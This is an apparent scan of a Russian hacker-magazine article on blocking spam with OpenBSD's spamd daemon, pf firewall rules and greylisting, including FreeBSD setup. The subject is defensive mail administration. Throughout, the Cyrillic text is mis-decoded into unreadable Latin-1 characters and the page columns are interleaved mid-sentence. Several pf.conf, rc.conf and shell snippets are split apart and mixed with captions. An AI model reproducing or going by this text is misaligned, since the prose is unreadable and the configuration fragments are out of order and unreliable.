Ñ ÊÀÆÄÛÌ ÄÍÅÌ ÏÎ×ÒÎÂÛÅ ßÙÈÊÈ ÄÎÁÐÎÏÎÐßÄÎ×ÍÛÕ ÏÎËÜÇÎÂÀÒÅËÅÉ ÍÀÂÎÄÍßÞÒÑß ÂÑÅ ÁÎËÜØÈÌ È ÁÎËÜØÈÌ ÊÎËÈ×ÅÑÒÂÎÌ ÍÅÆÅËÀÒÅËÜÍÎÉ ÊÎÐÐÅÑÏÎÍÄÅÍÖÈÈ ÐÅÊËÀÌÍÎÃÎ ÕÀÐÀÊÒÅÐÀ (UCE — UNSOLICITED COMMERCIAL EMAIL), À ÏÐÎÙÅ ÃÎÂÎÐß — ÑÏÀÌÎÌ. ÑÎÎÒÂÅÒÑÒÂÅÍÍÎ, ÍÀ ÐÀÇÁÎÐ ÝËÅÊÒÐÎÍÍÎÉ ÏÎ×ÒÛ ÏÐÈÕÎÄÈÒÑß ÇÀÒÐÀ×ÈÂÀÒÜ ÂÑÅ ÁÎËÜØÅ ÑÈË È ÄÐÀÃÎÖÅÍÍÎÃÎ ÂÐÅÌÅÍÈ. ÒÀÊÆÅ ÂÎÇÐÀÑÒÀÅÒ ÂÅÐÎßÒÍÎÑÒÜ ÏÐÎÏÓÑÊÀ ÈËÈ ÑËÓ×ÀÉÍÎÃÎ ÓÄÀËÅÍÈß ÂÀÆÍÎÃÎ ÏÈÑÜÌÀ. À ÒÅÏÅÐÜ ÏÐÈÁÀÂÜ Ê ÝÒÎÌÓ ÄÎÏÎËÍÈÒÅËÜÍÓÞ ÍÀÃÐÓÇÊÓ ÍÀ ÏÎ×ÒÎÂÛÅ ÑÅÐÂÅÐÛ È ÈÍÒÅÐÍÅÒ-ÊÀÍÀË, È ÒÛ ÏÎËÓ×ÈØÜ ÏÐÎÁËÅÌÓ, ÄÎÑÒÎÉÍÓÞ ÑÀÌÎÃÎ ÑÅÐÜÅÇÍÎÃÎ ÂÍÈÌÀÍÈß. ÑÅÃÎÄÍß ÌÛ ÏÎÊÀÆÅÌ, ÊÀÊ ÌÎÆÍÎ ÍÅ ÒÎËÜÊÎ ÓÑÏÅØÍÎ ÏÐÎÒÈÂÎÑÒÎßÒÜ ÑÏÀÌÅÐÀÌ, ÍÎ È ÍÀÍÅÑÒÈ ÈÌ ÎÒÂÅÒÍÛÉ ÓÄÀÐ ÑÎÊÐÓØÈÒÅËÜÍÎÉ ÑÈËÛ

 ÏÎÈÑÊÀÕ ÏÀÍÀÖÅÈ Åùå íà çàðå âîçíèêíîâåíèÿ ñïàìà áûëè ñôîðìèðîâàíû òàê íàçûâàåìûå îïåðàòèâíûå ñïèñêè «÷åðíûõ äûð» (RBL Realtime Blackhole List), ñîäåðæàùèå IP-àäðåñà ìîäåìíûõ ïóëîâ íåêîòîðûõ ïðîâàéäåðîâ è îòêðûòûõ ðåëååâ, ñ êîòîðûõ îñóùåñòâëÿëàñü ìàññîâàÿ ðàññûëêà íåæåëàòåëüíîé êîððåñïîíäåíöèè. Îò ðàçäåë íà ñàéòå OpenBSD, ïîñâÿùåííûé spamd âåðñèè ê âåðñèè ðàçðàáîò÷èêè ïî÷òîâûõ òðàíñïîðòíûõ àãåíòîâ (sendmail, qmail, ìåíÿåìûõ ñðåäñòâ è ñ íåîáûêíîâåííîé ëåãpostfix, exim) íå óñòàâàëè â ñâîèõ äåòèùàõ êîñòüþ ïîäñòðàèâàþòñÿ ïîä íîâåéøèå «âàêñîâåðøåíñòâîâàòü ñïåöèàëüíûå ñðåäñòâà öèíû». Êàê ìû óæå âñå óñïåëè óáåäèòüñÿ, äëÿ áîðüáû ñî ñïàìîì. Âìåñòå ñ òåì èçîáñïàì áåç îñîáûõ ïðîáëåì ïðîõîäèò ñêâîçü ðåòàëèñü ðàçëè÷íûå ýâðèñòè÷åñêèå ñèñòåöåïî÷êó RBL-ñåðâåðîâ, îñòàâëÿåò íå ó äåë ìû, ìåòîäû ôèëüòðàöèè è ãåíåòè÷åñêèå àëñâÿçêó SpamAssassin + razor + DCC, ñòàâèò ãîðèòìû, ïðèçâàííûå îòäåëÿòü ïî÷òîâûå â òóïèê MDA/MUA-ôèëüòðû. çåðíà îò ïëåâåë.  óïîðíîì ïðîòèâîñòîÿíèè spam vs antispam Íî íåñìîòðÿ íà âåëèêîå ìíîæåñòâî ïðåäëîïîáåäèòåëÿìè ïðàêòè÷åñêè âñåãäà âûõîäèëè æåííûõ ðåøåíèé, ïàíàöåè òàê è íå áûëî ñïàìåðû, è òðóäíî ñêàçàòü, ñêîëüêî áû îíè íàéäåíî. Òîëüêî ñîâìåùàÿ ðàçëè÷íûå âèäû åùå òîðæåñòâîâàëè, åñëè áû íà àðåíó íå çàùèòû (à â íåêîòîðûõ ñëó÷àÿõ äàæå ñ ïðèâûøåë spamd(8) — ôåéêîâûé SMTP-äåìîí ìåíåíèåì âîðêýðàóíäîâ, ÷òî äëÿ ñèñòåì ñ âîçìîæíîñòüþ ðàáîòû â greylisting-ðåæèìå. ýëåêòðîííîé ïî÷òû ÿâëÿåòñÿ ïðîñòî íåäîïóñòèìûì), ìîæíî áûëî äîñòèãíóòü ïðèåìëåÏÅÐÂÛÉ ÂÇÃËßÄ ÍÀ SPAMD ìîãî ðåçóëüòàòà. Âîò òîëüêî ýòîò «ïðèåìëåÑàì ïî ñåáå spamd ëèøåí òîãî ñïåöèôè÷åñìûé ðåçóëüòàò» óñòðàèâàë äàëåêî íå âñåõ. êîãî ôóíêöèîíàëà, êîòîðûé ïðèñóù ïîëíîÑëîæíîñòü çàêëþ÷àåòñÿ â òîì, ÷òî òåõíîëîâåñíûì MTA, è íå ñïîñîáåí ñàìîñòîÿòåëüíî ãèè ðàñïðîñòðàíåíèÿ ñïàìà íå ñòîÿò íà ìåñäàòü îòïîð ñïàìåðàì. Óíèêàëüíûå âîçìîæíîñòå, îíè ýâîëþöèîíèðóþò âìåñòå ñ ñèñòåìàìè òè spamd îòêðûâàþòñÿ òîëüêî ïðè åãî òåñíîì çàùèòû. Ñïàìåðû ïîñòîÿííî ñîâåðøåíñòâóâçàèìîäåéñòâèè ñ ôèëüòðîì ïàêåòîâ pf(4). þò ñâîè çíàíèÿ, íàðàùèâàþò àðñåíàë ïðèÑõåìà ðàáîòû pf + spamd ìîæåò áûòü ïðåäñ-

106

òàâëåíà ñëåäóþùèì îáðàçîì: äåìîí ïðîñëóøèâàåò 8025/tcp íà èíòåðôåéñå îáðàòíîé ïåòëè (127.0.0.1); ÷åðåç çàäàííûå èíòåðâàëû âðåìåíè óòèëèòà spamdsetup(8) îïåðèðóåò õýøèðîâàííîé áàçîé äàííûõ IP-àäðåñîâ ñïàìåðîâ; ñ ïîìîùüþ pfctl(8) ñïèñêè IP-àäðåñîâ íà ëåòó çàãðóæàþòñÿ â ñîîòâåòñòâóþùèå òàáëèöû è ðóëåñåòû ôàéðâîëà. Íà îñíîâàíèè ïîëó÷åííûõ äàííûõ è â çàâèñèìîñòè îò IP-àäðåñà ïîäêëþ÷èâøåãîñÿ SMTP-ñåðâåðà, â íàøèõ ñèëàõ:

- ïåðåíàïðàâèòü âõîäÿùåå SMTP-ïîäêëþ÷åíèå äåìîíó spamd, êîòîðûé íå ðàçîðâåò ñîåäèíåíèå, êàê ìîæíî áûëî ïðåäïîëîæèòü, à íàîáîðîò, áóäåò ñòàðàòüñÿ ìàêñèìàëüíî äîëãî óäåðæèâàòü ñïàìåðà «íà ëèíèè»:

table <spamd> persist rdr pass on $ext_if inet proto tcp from <spamd> to port smtp \ -> 127.0.0.1 port spamd

- ðàçðåøèòü ïðîõîæäåíèå âàëèäíûõ ïàêåòîâ: block in pass in log on $ext_if inet proto tcp from any to $ext_if \ port smtp flags S/SA keep state

 èòîãå ñïàì íå äîñòàâëÿåòñÿ (âàæíî îòìåòèòü, ÷òî ïîñëå çàâåðøåíèÿ ñîåäèíåíèÿ

XÀÊÅÐ 01 /85/ 06


-ÊÎÄÛ ÎØÈÁÎÊ, ÍÅÊÎÒÎÐÛÅ SMTP ÏÐÀÂÈÒÅËÜ ÏÎÑËÅ ÊÎÒÎÐÛÕ ÎÒ ÏÐÀÂÊÈ ÏÈÑÜÌÀ ÎÒ Ó ÒÊ Û ÎÏ Ï ÒÜ ÐÈ ÒÎ ÎÁßÇÀÍ ÏΠ450 Requested mail action not taken: mailbox unavailable (E.g., mailbox busy) 451 Requested action aborted: local error in processing 550 Requested action not taken: mailbox unavailable (E.g., mailbox not found, no access) spamd <--> MTA ðåêëàìíûå ïèñüìà áóäóò âîçâðàùåíû â ïî÷òîâóþ î÷åðåäü îòïðàâèòåëÿ), íàãðóçêà íà íàø ñåðâåð ïðàêòè÷åñêè íå âîçðàñòàåò, à âîò âðåìÿ è ñèñòåìíûå ðåñóðñû ïîäêëþ÷èâøåãîñÿ ñïàìåðñêîãî ñåðâåðà, êîòîðûé îáðàáàòûâàåò ñîòíè ñîåäèíåíèé îäíîâðåìåííî, òðàòÿòñÿ âïóñòóþ. Ìîæíî ñêàçàòü, spamd ïðîâîäèò î÷åíü àêêóðàòíóþ DoS-àòàêó, ïðè ýòîì íå îòñòóïàÿ íè íà éîòó îò ïîëîæåíèé, çàäîêóìåíòèðîâàííûõ â ïî÷òîâûõ RFC. Äà-äà, â èäåàëå, åñëè áû âñå ïî÷òîâûå ñåðâåðû áûëè îáîðóäîâàíû ïîäîáíîé çàùèòîé, ñïàìåðàì ïðèøëîñü áû âåñüìà òóãî. ÎÒ ÒÅÎÐÈÈ Ê ÏÐÀÊÒÈÊÅ Êîíôèãóðèðîâàíèå äåìîíà ñëåäóåò íà÷èíàòü ñ ïðàâêè spamd.conf(5).  êà÷åñòâå çíà÷åíèÿ äèðåêòèâû «all» óêàçûâàåì àäðåñà çàñâåòèâøèõñÿ ñïàìåðîâ èç äðóæåñòâåííûõ âîñòî÷íûõ ñòðàí (ìîæíî, êîíå÷íî, âêëþ÷èòü â ïåðå÷èñëåíèå ñåêöèè spamhaus è spews, íî òîãäà áóäü âíóòðåííå ãîòîâ ê òîìó, ÷òî â îäíî ïðåêðàñíîå óòðî òû ïåðåñòàíåøü ïîëó÷àòü ïî÷òó èç äîìåíîâ mail.ru, narod.ru, yandex.ru è ò.ä.): # vi /etc/spamd.conf all:\ :china:korea: china:\ :black:\ :msg="SPAM. Your address %A appears to be from China\n\ See www.okean.com/asianspamblocks.html for more details":\ :method=http:\ :file=www.openbsd.org/spamd/chinacidr.txt.gz: korea:\ :black:\ :msg="SPAM. Your address %A appears to be from Korea\n\ See www.okean.com/asianspamblocks.html for more details":\ :method=http:\ :file=www.openbsd.org/spamd/koreacidr.txt.gz:

Êëþ÷åâîå ñëîâî black îïðåäåëÿåò ïðèíàäëåæíîñòü ê áëýêëèñòó, msg çàäàåò ñîîáùåíèå îá îøèáêå, âîçâðàùàåìîå SMTP-ñåðâåðó îòïðàâèòåëÿ, à method è file îïèñûâàþò ñïîñîá ïîëó÷åíèÿ ñæàòîãî gzip(1)'îì òåêñòîâîãî ôàéëà, ñîäåðæàùåãî IP-àäðåñà ñïàìåðîâ. Äàëåå óòèëèòîé crontab(1) âûçûâàåì òåêñòîâûé ðåäàêòîð (òîò, ÷òî îïðåäåëåí â ïåðåìåííîé îêðóæåíèÿ $EDITOR) äëÿ ïåðèîäè÷åñêîãî îáíîâëåíèÿ áàçû ñ àäðåñàìè ( êàæäûé ÷àñ):

# crontab -e 0

*

*

*

*

/usr/libexec/spamd-setup

Òåïåðü íåíàäîëãî îòâëå÷åìñÿ îò ïðîöåññà êîíôèãóðèðîâàíèÿ è çàîñòðèì ñâîå âíèìàíèå íà ðåæèìå greylisting. ÌÀÃÈß GREYLISTING Áîðüáà ñî ñïàìîì ìîæåò èäòè íà äâóõ ôðîíòàõ: íà ñòîðîíå ñåðâåðà ëèáî íà ñòîðîíå êëèåíòà. Çàñòàâëÿòü êëèåíòà ñîâåðøàòü êàêèå-ëèáî òåëîäâèæåíèÿ — ýòî êîùóíñòâî :), à íà ñòîðîíå ñåðâåðà, ïîìèìî òðàäèöèîííûõ ÷åðíûõ ñïèñêîâ, ñóùåñòâóþò äâà ðàçëè÷íûõ ïîäõîäà: àíàëèç íåïîñðåäñòâåííîé êîððåñïîíäåíöèè, êîãäà ïî ñîâîêóïíîñòè ìíîãèõ ïàðàìåòðîâ äåëàåòñÿ âûâîä î «÷èñòîòå» êàæäîãî êîíêðåòíîãî ïèñüìà, à òàêæå òåõíîëîãèÿ «ñåðûõ ñïèñêîâ» (greylisting). Âîò î ïîñëåäíåé ìû è ïîãîâîðèì ïîäðîáíåå, âåäü ïðè ãðàìîòíîé ðåàëèçàöèè è ïðàâèëüíîé íàñòðîéêå äàííàÿ òåõíîëîãèÿ ñïîñîáíà îòôèëüòðîâàòü äî 98% ñïàìà, íå çàòðà÷èâàÿ âðåìÿ è ðåñóðñû ñåðâåðà íà òðàôèê è îáðàáîòêó «ãðÿçíûõ»ïèñåì. Çàäà÷à ñïàìåðà ñîñòîèò â òîì, ÷òîáû â êðàò÷àéøèå ñðîêè îòïðàâèòü ìàêñèìàëüíî âîçìîæíîå êîëè÷åñòâî ðåêëàìíûõ ïèñåì. Ïðè ýòîì óñïåøíîñòü îòïðàâêè êàæäîãî ñîîáùåíèÿ íå îòñëåæèâàåòñÿ. Îäíà èç ãëàâíûõ ïðè÷èí — â ìèðå ýëåêòðîííîé ïî÷òû íàäåæíîñòü äîñòàâêè èñõîäÿùåé êîððåñïîíäåíöèè äîðîãîãî ñòîèò, à èìåííî: íàëè÷èÿ ñïåöèàëüíûõ èíæåêòîðîâ, âûïîëíåíèÿ äîïîëíèòåëüíûõ ðåñóðñîåìêèõ ñèñòåìíûõ âûçîâîâ, ê ïðèìåðó fsync(2) è write(2), è îïåðàöèé ñ î÷åðåäüþ /var/spool/mqueue (ëèáî ìèãðàöèè î÷åðåäåé). Òàê ÷òî ðàáîòó ñïàìåðîâ ìîæíî îõàðàêòåðèçîâàòü êàê «îòïðàâèë è çàáûë» (fire and forget). Ìû íà ýòîì è ñûãðàåì. Ñóòü èäåè greylisting'à ïðåäåëüíî ïðîñòà: êîððåêòíî ñêîíôèãóðèðîâàííûé ïî÷òîâûé ñåðâåð îòïðàâèòåëÿ, ïîëó÷èâ îïðåäåëåííûé îòâåò îò ñåðâåðà ïîëó÷àòåëÿ, îáÿçàí ïîâòîðèòü ïîïûòêó äîñòàâêè ïèñüìà ÷åðåç íåêîòîðûé ïðîìåæóòîê âðåìåíè (îáû÷íî 5, 15, 25, 30 èëè 60 ìèíóò). Çíàÿ ýòî, â êà÷åñòâå îòâåòà íà ñîåäèíåíèå îò íåèçâåñòíîãî ïî÷òîâîãî ñåðâåðà ñ ïîìîùüþ spamd ìû áóäåì âîçâðàùàòü íåñòàíäàðòíîå SMTP-ñîîáùåíèå OK èëè Rejected, à âðåìåííóþ îøèáêó ñ êîäîì 450, 451 èëè 550. Êîãäà ïî÷òîâûé ñåðâåð îòïðàâèòåëÿ ïîâòîðèò äîñòàâêó ïèñüìà (à ïî RFC îí îáÿçàí ýòî ñäåëàòü), ìû ïðèìåì ê ñâåäåíèþ, ÷òî äàííûé ñåðâåð óæå ïûòàëñÿ îòïðàâèòü íàì ïèñüìî íåñêîëüêî ìèíóò íàçàä, à çíà÷èò, îí íå ñïàìåð. È òîãäà ìû ïðèìåì êîððåñïîíäåíöèþ. # tail /var/log/maillog Dec 1 01:55:53 toxahost sm-mta[21632]: j9F9jgYV021632: to=<andrushock@domain1.ru>, delay=00:00:11, xdelay=00:00:11, mailer=esmtp, pri=30808, relay=mail.domain1.ru. [81.211.11.22], dsn=4.3.0, stat=Deferred: 451 Temporary failure, please try again later.

Íà ïðèâåäåííîì êóñêå ëîãà âèäíî, ÷òî ñåðâåð mail.domain1.ru îòâåðã íàøå ïèñüìî àäðåñàòó andrushock@domain1.ru. Åñëè áû ìû çàãëÿíóëè â /var/log/daemon ýòîãî ñåðâåðà, ìû áû óâèäåëè ðåçóëüòàò ðàáîòû greylisting: # tail /var/log/daemon Dec 1 01:56:19 mail spamd[3135]: 62.16.22.33: connected (1/0) Dec 1 01:56:30 mail spamd[3135]: (GREY) 62.16.22.33: <toxa@domain2.ru> -> <andrushock@domain1.ru> Dec 1 01:56:30 mail spamd[3135]: 62.16.22.33: disconnected after 11 seconds.

ñïðàâî÷íàÿ ñòðàíèöà spamd

XÀÊÅÐ 01 /85/ 06

107


UNIXOID ///// ISSUE

ïðàâèì ðóëåñåòû ôàéðâîëà

Çàòåì, ÷åðåç íåêîòîðîå âðåìÿ, ìû óâèäèì, ÷òî àäðåñ ñåðâåðà îòïðàâèòåëÿ — 62.16.22.33 — çàíåñåí â «áåëûé ñïèñîê», è ïðè ïîïûòêå ïîâòîðíîé îòïðàâêè ïèñüìî óéäåò íåìåäëåííî, áåç êàêèõ-ëèáî ïðîáëåì: # pfctl -t spamd-white -T show | grep 62.16.22.33 62.16.22.33

×òîáû ïîëó÷èòü âñå ýòè âêóñíîñòè, âêëþ÷èì spamd â êîíôèãóðàöèîííîì ôàéëå ñòàðòîâîãî ñöåíàðèÿ. Çà ñ÷åò óêàçàííûõ íèæå àðãóìåíòîâ ìû ñìîæåì ïðîèçâåñòè áîëåå ïîäðîáíîå æóðíàëèðîâàíèå ñîáûòèé ('-v'), ïîäìåíèòü ïðèâåòñòâåííûé áàííåð íà «Postfix» ('-n') è ïåðåâåñòè äåìîíà â ðåæèì greylisting (spamd_grey=YES àíàëîã '-g'): # vi /etc/rc.conf spamd_flags="-v -n Postfix" spamd_grey=YES

ïðèìåð êîíôèãóðàöèîííîãî ôàéëà

çå «òðèïëåòîì», çàïðîñ îáðàáàòûâàåòñÿ, ïèñüìî äîñòàâëÿåòñÿ, à ñåðâåð îòïðàâèòåëÿ çàíîñèòñÿ óæå â «áåëûé ñïèñîê», è äàëåå âñå ïèñüìà ñ äàííîãî ñåðâåðà ïðèíèìàþòñÿ áåç çàäåðæåê. Íî, åñëè ñ ýòîãî ïî÷òîâîãî ñåðâåðà ïèñåì íå ïðèõîäèëî íà ïðîòÿæåíèè äëèòåëüíîãî ïåðèîäà âðåìåíè — whiteexp (ïî óìîë÷àíèþ 36 äíåé) — ñåðâåð óäàëÿåòñÿ èç «áåëîãî ñïèñêà» è äàëåå ðàññìàòðèâàåòñÿ êàê «íîâûé». Òðåòèé âðåìåííîé îòðåçîê, êîòîðûì îïåðèðóåò spamd — greyexp — âðåìÿ, â òå÷åíèå êîòîðîãî spamd îæèäàåò ïîâòîðíîãî ñîåäèíåíèÿ îò ñåðâåðà, òî åñòü âðåìÿ ïðåáûâàíèÿ ñåðâåðà â «ñåðûõ ñïèñêàõ». Îíî ñîñòàâëÿåò ïî óìîë÷àíèþ 4 ÷àñà. Íàñòðîèòü ýòè òðè ïàðàìåòðà ìîæíî óêàçàíèåì â spamlogd_flags îïöèè '-G passtime:greyexp:whiteexp' (â ìèíóòàõ). Äåôîëòíûå óñòàíîâêè, âïðî÷åì, âïîëíå ðàçóìíû, ðàçâå ÷òî passtime ìîæíî âûñòàâèòü ïîìåíüøå: íå 25, à 5 ìèíóò. Âíåñåííûå â ôàéë /etc/rc.conf èçìåíåíèÿ âñòóïÿò â ñèëó òîëüêî ïîñëå ïåðåçàãðóçêè. Åñëè ïî êàêîé-òî ïðè÷èíå õîñò ïåðåãðóæàòü íåëüçÿ, òî âûïîëíè òàêóþ ïîñëåäîâàòåëüíîñòü êîìàíä:

spamlogd_flags="" # eval /usr/libexec/spamd -g -v -n Postfix

 ðåæèìå greylisting äåìîí spamd áóäåò âåñòè ñåáÿ ñòàíäàðòíûì îáðàçîì äëÿ âñåõ àäðåñîâ, íàéäåííûõ â òàáëèöå <spamd>, òîãäà êàê äëÿ âñåõ îñòàëüíûõ áóäåò ðàáîòàòü â ðåæèìå «ñåðûõ ñïèñêîâ».  äàííîì ðåæèìå spamd, êàê íåòðóäíî ïðåäïîëîæèòü, îïåðèðóåò ñ òðåìÿ çíà÷åíèÿìè: IP-àäðåñîì ñåðâåðà îòïðàâèòåëÿ, ïî÷òîâûì àäðåñîì îòïðàâèòåëÿ è ïî÷òîâûì àäðåñîì ïîëó÷àòåëÿ. Åñëè ïîëó÷åííûé «òðèïëåò» âñòðå÷àåòñÿ âïåðâûå, ìû ïîëó÷àåì ïîêàçàííûé âûøå îòëóï è çàïèñü â òàáëèöó /var/db/spamd (â «ñåðûé ñïèñîê»). Ïîñëå îïðåäåëåííîãî âðåìåíè — passtime (ïî óìîë÷àíèþ ðàâíî 25 ìèíóòàì), — åñëè ñåðâåð ïîëó÷àåò ïîâòîðíûé çàïðîñ ñ ïðèñóòñòâóþùèì â áà-

ÎÐÈÈ ÏÅÑ×ÈÍÊÈ ÈÑÒ Spamd ÿâëÿåòñÿ äåòèùåì êîìàíäû ðàçðàáîò÷èêîâ OpenBSD è âïåðâûå ïîÿâèëñÿ â âåðñèè 3.3 ýòîé ñèñòåìû. Ïî ïðåäàíèþ, ãëàâíûé äåâåëîïåð è èäåéíûé âäîõíîâèòåëü ïðîåêòà OpenBSD, Òåî äå Ðààäò, íå íà øóòêó ïåðåâîëíîâàëñÿ, ïîëó÷èâ ïî ïî÷òå ïÿòíàäöàòûé ðàç çà äåíü ïðåäëîæåíèå óâåëè÷èòü ñâîé äåòîðîäíûé îðãàí.  òîò æå âå÷åð îí ñîçâàë ñâîþ êîìàíäó è áðîñèë êëè÷: «Äåëàéòå ÷òî õîòèòå, íî ÷òîáû ê óòðó ó íàñ áûëà ñâîÿ, íàäåæíàÿ çàùèòà îò ñïàìà!». Âñþ íî÷ü ðàçðàáîò÷èêè íåïðåðûâíî ïèñàëè êîä, è ê âå÷åðó ñëåäóþùåãî äíÿ ïåðâàÿ áåòà-âåðñèÿ spamd óæå îáîðîíÿëà ðóáåæè @openbsd.org.

# /usr/libexec/spamd-setup # /usr/libexec/spamlogd

PACKET FILTER: ÒÀÈÍÑÒÂÎ ÃÀÐÌÎÍÈÉ Èòàê, spamd è êîìïàíèÿ íàõîäÿòñÿ â ïîëíîé áîåâîé ãîòîâíîñòè, îñòàëîñü ïîäãîòîâèòü ðóëåñåòû ôàéðâîëà. # vi /etc/pf.conf /* Âíåøíèé ñåòåâîé èíòåðôåéñ */ ext_if = "fxp0" /* Òàáëèöà ðàäèêñà, êóäà áóäóò çàíîñèòüñÿ IP-àäðåñà èç ñåêöèé china è korea */ table <spamd> persist /* Çäåñü áóäåì õðàíèòü IP-àäðåñà SMTP-ñåðâåðîâ, êîòîðûå ïðîøëè greylisting-ïðîâåðêó */ table <spamd-white> persist /* Ëîêàëüíàÿ êîïèÿ ñïèñêà èçâåñòíûõ SMTP-ñåðâåðîâ, êîòîðûå â âèäó ñïåöèôèêè ñâîåé ðàáîòû íå îñóùåñòâëÿþò ïîâòîðíóþ äîñòàâêó ïèñüìà cvs.puremagic.com/viewcvs/greylisting/schema/whitelist_ip.txt */ table <spamd-whitelist> persist file "/etc/mail/whitelist.txt" /* Ñïèñîê äîâåðåííûõ SMTP-ñåðâåðîâ */ table <spamd-whitegroup> { 81.210.33.44, 81.212.44.55 } /* Íå ñëåäóåò ôîðâàðäèòü ñîåäèíåíèÿ, êîòîðûå èíèöèèðóþò äðóæåñòâåííûå SMTPñåðâåðà */

108

XÀÊÅÐ 01 /85/ 06


Õ ÏÐÎÂÅÐßÅÌ ÍÀËÈ×ÈÅ ÍÅÎÁÕÎÄÈÌÛÕ ÑÈÑÒÅÌÍÛ ÇÀÏÈÑÅÉ

Íå çàáóäü óáåäèòüñÿ, ÷òî ñèñòåìíûé ôàéë /etc/services ñîäåðæèò ïîëíûé ïåðå÷åíü ñëóæá, ó÷àñòâóþùèõ â íàøåé êîíñòðóêöèè: % egrep 'smtp|spam' /etc/services smtp 25/tcp #mail spamd 8025/tcp # spamd(8) spamd-cfg 8026/tcp # spamd(8) configuration

no rdr inet proto tcp from <spamd-whitelist> to port smtp no rdr inet proto tcp from <spamd-whitegroup> to port smtp /* Ñïàìåðîâ îòïðàâëÿåì ê spamd */ rdr pass on $ext_if inet proto tcp from <spamd> to port smtp \ -> 127.0.0.1 port spamd

ïîäñ÷èòûâàåì êîëè÷åñòâî çàïèñåé â êàæäîé èç òàáëèö

rdr pass on $ext_if inet proto tcp from ! <spamd-white> to \ port smtp -> 127.0.0.1 port spamd /* Spamd ëîìàåò ðàáîòó SMTP AUTH, ïîýòîìó àóòåíòèôèêàöèþ ïî÷òîâûõ êëèåíòîâ ìîæíî ïåðåíåñòè íà 26/tcp */

ïîäêëþ÷åíèÿ ñ ðàçëè÷íûõ ñåðâåðîâ, íî îòëè÷íî ïðîÿâëÿåò ñåáÿ íà êîðïîðàòèâíûõ ïî÷òîâûõ ñåðâåðàõ ñðåäíèõ è íå î÷åíü êðóïíûõ ôèðì, ó ñîòðóäíèêîâ êîòîðûõ íàëàæåíà äåëîâàÿ ïåðåïèñêà ñî ñðàâíèòåëüíî óçêèì êðóãîì ïàðòíåðîâ.

rdr pass on $ext_if inet proto tcp from any to port 26 \ -> 127.0.0.1 port smtp /* Îáåñïå÷èâàåì äîñòóï ê íàøåìó ïî÷òîâîìó ñåðâåðó */

ÔÐÞØÍÛÅ ÏÎÑÊÐÈÏÒÓÌÛ Spamd ïîðòèðîâàí â FreeBSD, è åãî óñòàíîâêó ìîæíî ïðîèçâåñòè øòàòíûì îáðàçîì — èç ïîðòîâ:

block in pass in log on $ext_if inet proto tcp from any to $ext_if \ port smtp flags S/SA keep state

×ðåçìåðíóþ àêòèâíîñòü ñïàìåðîâ ìîæíî îñòàíîâèòü, îòñëåæèâàÿ ìàêñèìàëüíîå êîëè÷åñòâî ïîäêëþ÷åíèé (áóäü âíèìàòåëåí, â äàííîì ñëó÷àå spamd è MTA ðàçíåñåíû ïî ðàçíûì ñåðâåðàì):

# cd /usr/ports/mail/spamd # make install clean

Ðàçóìååòñÿ, äëÿ ðàáîòû spamd âî FreeBSD äîëæíà áûòü âêëþ÷åíà ïîääåðæêà OpenBSD PF: # vi /etc/rc.conf

# vi /etc/pf.conf pf_enable="YES" ext_if = "fxp0"

pflog_enable="YES"

smtp_server = "192.168.5.2"

pfspamd_enable="YES" pfspamd_flags="-G 5:4:864 -g -v"

table <spammers> persist rdr on $ext_if inet proto tcp from any to $ext_if \

Ïàðà çàìå÷àíèé. Âî-ïåðâûõ, äëÿ ðàáîòû greylisting mode íåîáõîäèìà ïîääåðæêà ôàéëîâîé ñèñòåìû ôàéëîâûõ äåñêðèïòîðîâ, fdescfs:

port smtp tag SPAM -> $smtp_server # echo "fdescfs /dev/fd fdescfs rw 0 0" >> /etc/fstab block in log quick on $ext_if inet from <spammers>

# echo 'fdescfs_load="YES"' >> /boot/loader.conf

pass in log on $ext_if tagged SPAM flags S/SA synproxy state \

# kldload fdescfs

(max-src-conn 100, max-src-conn-rate 10/60, \

# mount /dev/fd

overload <spammers> flush global)

ÃÐÓÑÒÍÛÅ ÍÎÒÊÈ Ñïðàâåäëèâîñòè ðàäè íóæíî îòìåòèòü, ÷òî ðåàëèçàöèÿ spamd äàëåêà îò èäåàëà. Èñïîëüçîâàíèå china è korea ñäåëàíî ñ îäíîé öåëüþ: ìèíèìèçèðîâàòü îáúåì ðàñõîäóåìîé îïåðàòèâíîé ïàìÿòè. Âåäü êîãäà çàíîñÿòñÿ äîïîëíèòåëüíûå çàïèñè â òàáëèöó ñîñòîÿíèÿ ñîåäèíåíèé, ÿäðî è spamd â äèíàìè÷åñêîì ðåæèìå íà÷èíàþò âûäåëÿòü ïàìÿòü äëÿ ïîäêëþ÷èâøåãî ñåðâåðà. Êðîìå òîãî, ñàìà òåõíîëîãèÿ greylisting ïîäðàçóìåâàåò íåêîòîðóþ ïåðâîíà÷àëüíóþ çàäåðæêó äëÿ ïèñåì îò íåèçâåñòíûõ ïî÷òîâûõ ñåðâåðîâ. Ìû ìîæåì óêàçàòü íèæíþþ ïëàíêó ýòîé çàäåðæêè îïöèåé passtime, íî â áîëüøèíñòâå ñëó÷àåâ íàì ïðèäåòñÿ ïîëàãàòüñÿ íà ðàçóìíûå íàñòðîéêè ñåðâåðîâ îòïðàâèòåëÿ. 10, 15 ìèíóò — ïî÷òè âñåãäà òåðïèìàÿ öèôðà, íî åñëè íàì âñòðåòèòñÿ õîñò, êîòîðûé âîçîáíîâëÿåò îòïðàâêó ñïóñòÿ ÷àñ-äâà, òóò óæå íè÷åãî íå ïîïèøåøü. Âîò ïî÷åìó greylisting ïëîõî ðàáîòàåò íà ïóáëè÷íûõ ïî÷òîâûõ ñèñòåìàõ, òàêèõ êàê Rambler, ãäå ñïåöèôè÷íû ïîñòîÿííûå

XÀÊÅÐ 01 /85/ 06

Âî-âòîðûõ, äëÿ òîãî ÷òîáû íå ïóòàòü OpenBSD spamd è ïåðëîâûé äåìîí spamd, âõîäÿùèé â ñîñòàâ SpamAssassin, ñòàðòîâûé ñêðèïò íàçâàí pfspamd.sh. Îäíàêî ýòîãî ìàëî: ñèñòåìà ñòàðòîâûõ ñêðèïòîâ FreeBSD äåëàåò âûâîä î ðàáîòå ïðîöåññà ïî âûâîäó êîìàíäû ps. È, åñëè â ñèñòåìå çàïóùåí spamd îò SpamAssassin, pfspamd.sh áóäåò îòðàáàòûâàòü íåêîððåêòíî. Ýòîò âîïðîñ ñîñóùåñòâîâàíèÿ äâóõ spamd â ñèñòåìå ïîêà íå ðåøåí, è ïîòîìó íàì ïðèäåòñÿ ïðèìåíèòü ìàëåíüêèé õàê: # mv /usr/local/libexec/spamd /usr/local/libexec/pfspamd # vi /usr/local/etc/rc.d/pfspamd.sh /* Íàõîäèì è çàìåíÿåì ñòðî÷êó */ command="/usr/local/libexec/pfspamd" BINARY YOUR’S z

109


